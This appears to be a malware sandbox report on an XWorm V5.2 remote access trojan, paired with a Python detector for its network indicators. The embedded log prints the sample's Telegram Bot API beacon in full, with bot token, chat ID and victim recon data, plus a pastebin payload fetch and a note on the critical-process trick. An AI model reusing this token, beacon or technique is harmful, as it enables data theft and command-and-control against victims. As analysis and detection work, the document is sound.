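http 192.168.2.8 pastebin.com GET /raw/Zx6DUkf9
dns 192.168.2.8 api.telegram.org 149.154.167.220
http 192.168.2.8 api.telegram.org GET /bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka
dns 192.168.2.8 ip-api.com 208.95.112.1
http 192.168.2.8 ip-api.com GET /line/?fields=hosting
tcp 192.168.2.8 115.69.183.222:37593
dns 192.168.2.8 www.msftconnecttest.com 203.0.113.10
http 192.168.2.8 www.msftconnecttest.com GET /connecttest.txt
"""


def parse_beacon_text(text):
    """Turn XWorm's 'Key : Value' recon message into a dict.

    A key with an empty value (the 'New Clinet :' line) takes the next
    non-empty line as its value, which is how the client ID is laid out.
    """
    fields, pending = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        key, sep, value = line.partition(":")
        if sep:
            if value.strip():
                fields[key.strip()] = value.strip()
            else:
                pending = key.strip()
        elif pending:
            fields[pending] = line
            pending = None
    return fields


def analyse_telegram_request(path, query):
    """Return a finding for a Bot API call, or None if the path is not one."""
    m = TELEGRAM_BOT_PATH.match(path)
    if not m:
        return None
    bot_id, token, method = m.groups()
    params = parse_qs(query)
    text = params.get("text", [""])[0]
    banner = XWORM_BANNER.search(text)
    return {
        "rule": "telegram-bot-beacon",
        "bot_id": bot_id,
        "token_prefix": token[:4] + "...",  # enough to pivot on, not to reuse
        "method": method,
        "chat_id": params.get("chat_id", [""])[0],
        "family": banner.group(1) if banner else None,
        "fields": parse_beacon_text(text),
    }


def detect(log_text):
    """Walk the constructed log once and return findings in log order."""
    resolved = set()   # addresses seen as DNS answers
    findings = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=4)
        if not parts:
            continue
        kind, dst = parts[0], parts[2]
        if kind == "dns":
            resolved.add(parts[3])
        elif kind == "tcp":
            ip, _, port = dst.partition(":")
            if ip not in resolved:   # no name lookup preceded this flow
                findings.append({"rule": "direct-ip-no-dns", "dst": ip, "port": int(port)})
        elif kind == "http":
            path, _, query = parts[4].partition("?")
            if dst == "api.telegram.org":
                finding = analyse_telegram_request(path, query)
                if finding:
                    findings.append(finding)
            elif dst == "pastebin.com" and path.startswith("/raw/"):
                findings.append({"rule": "pastebin-raw-fetch", "paste": path.rsplit("/", 1)[1]})
            elif dst == "ip-api.com" and "hosting" in parse_qs(query).get("fields", [""])[0].split(","):
                findings.append({"rule": "hosting-check", "dst": dst})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The direct-IP rule keys on "no DNS answer carried this address", which is the same logic behind the sandbox's "TCP traffic detected without corresponding DNS query" entries; in a real deployment feed it DNS answers from the same capture window so that CDN-fronted hosts do not trip it.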
(Note on the strings below: the entries sourced from lsass.exe, svchost.exe and powershell.exe memory (DigiCert CRL/OCSP URLs, WS-Trust and XML schema URIs, Pester, NuGet, contoso.com, office.com) are ordinary Windows and PowerShell content and not attacker infrastructure. The strings attributable to the sample are the ones whose source is RdLfpZY5A9.exe, KrnlSetupSus.exe or the dropped ntoskrnl.exe: the ip-api.com hosting check, the Telegram Bot API URL and the pastebin raw URL.)
Source: Microsoft-Windows-LiveId%4Operational.evtx.21.dr | String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicer
Source: lsass.exe, 0000000A.00000002.2814369163.00000213BD61E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRoot
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000000A.00000000.1463231938.00000213BD444000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463357338.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2798365665.00000213BD471000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD613000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mU
Source: lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.dX
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000000A.00000000.1463231938.00000213BD444000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463357338.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2798365665.00000213BD471000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD613000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/Dig
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000000A.00000000.1462518169.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2788373809.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463231938.00000213BD400000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000004.00000002.1499817567.000001A84BBE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD61E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463231938.00000213BD444000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463357338.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2798365665.00000213BD471000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000014.00000000.1529745173.000001486A5B0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 0000001D.00000000.1573955401.000001F173E83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.msftconnecttest.com
Source: powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=59991
Source: powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
Source: svchost.exe, 00000026.00000002.2806525834.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865572552.000001E7315D7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1627188967.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comSRD1%
Source: svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comcom
Source: svchost.exe, 00000026.00000003.1890329925.000001E7311D6000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comcomD
Source: svchost.exe, 00000026.00000002.2851123879.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comcomverUX
Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1460763535.000001A83CB18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000028.00000000.1654017861.000001E2F9C6A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2777887655.000001E2F9C6A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://otelrules.azureedge.net/lse
Source: svchost.exe, 00000026.00000000.1627319960.000001E730F3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2813637580.000001E730F43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1880000522.000001E730F41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.comSRD1-
Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/Zx6DUkf9
Source: svchost.exe, 00000026.00000002.2847177850.000001E731665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comSRD13
Source: svchost.exe, 00000026.00000003.1881507986.000001E7315C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.comSRD1#
Source: svchost.exe, 00000026.00000003.1868296432.000001E73150D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1868219050.000001E73150B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1879111396.000001E73150F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867927983.000001E731506000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867055083.000001E731284000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1631048778.000001E731284000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/pwaimages
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49713 version: TLS 1.2

Operating System Destruction

Source: C:\ProgramData\KrnlSetupSus.exe | Process information set: 01 00 00 00
(A process-information value of 1 is what a process writes to mark itself critical, which is consistent with this section's heading: terminating a critical process crashes Windows. During response, clear the flag or suspend the process rather than killing it outright.)

System Summary

Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\ProgramData\ntoskrnl.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
(The AsyncRAT rule is a family-level signature that also fires on XWorm clients; the Telegram beacon above names this one as XWorm V5.2. Note that the dropped C:\ProgramData\ntoskrnl.exe is the same payload under a kernel-image filename, not a Windows binary.)
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C56242C GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,3_2_1C56242C
